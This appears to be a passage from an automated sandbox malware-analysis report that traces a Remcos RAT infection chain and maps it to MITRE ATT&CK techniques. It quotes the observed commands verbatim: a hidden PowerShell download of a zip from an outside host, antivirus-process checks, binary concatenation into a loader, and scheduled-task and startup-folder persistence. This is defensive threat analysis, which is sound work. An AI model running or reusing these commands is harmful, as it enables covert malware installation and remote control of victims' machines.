    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,38_2_00CD14AE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,38_2_00CD1FB0
    Source: Propose.com, 0000001E.00000003.1925473839.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1918830106.0000000000D13000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: LinkHub.comBinary or memory string: Shell_TrayWnd
    Source: logs.dat.30.drBinary or memory string: [Program Manager]
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90A08 cpuid 38_2_00C90A08
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CCE5F4 GetLocalTime,38_2_00CCE5F4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CCE652 GetUserNameW,38_2_00CCE652
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CABCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,38_2_00CABCD2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,13_2_00406805
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    barindex
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    Source: LinkHub.comBinary or memory string: WIN_81
    Source: LinkHub.comBinary or memory string: WIN_XP
    Source: LinkHub.com.30.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
    Source: LinkHub.comBinary or memory string: WIN_XPe
    Source: LinkHub.comBinary or memory string: WIN_VISTA
    Source: LinkHub.comBinary or memory string: WIN_7
    Source: LinkHub.comBinary or memory string: WIN_8

    Remote Access Functionality

    barindex
    Detected Remcos RAT
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comMutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CF2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,38_2_00CF2263
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CF1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,38_2_00CF1C61

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information111
    Scripting    		2
    Valid Accounts    		1
    Windows Management Instrumentation    		111
    Scripting    		1
    Exploitation for Privilege Escalation    		1
    Disable or Modify Tools    		121
    Input Capture    		2
    System Time Discovery    		Remote Services1
    Archive Collected Data    		2
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory1
    Account Discovery    		Remote Desktop Protocol1
    Email Collection    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter    		2
    Valid Accounts    		2
    Valid Accounts    		2
    Obfuscated Files or Information    		Security Account Manager3
    File and Directory Discovery    		SMB/Windows Admin Shares121
    Input Capture    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		21
    Access Token Manipulation    		1
    DLL Side-Loading    		NTDS28
    System Information Discovery    		Distributed Component Object Model3
    Clipboard Data    		1
    Remote Access Software    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud Accounts2
    PowerShell    		2
    Registry Run Keys / Startup Folder    		12
    Process Injection    		111
    Masquerading    		LSA Secrets121
    Security Software Discovery    		SSHKeylogging2
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Scheduled Task/Job    		2
    Valid Accounts    		Cached Domain Credentials121
    Virtualization/Sandbox Evasion    		VNCGUI Input Capture13
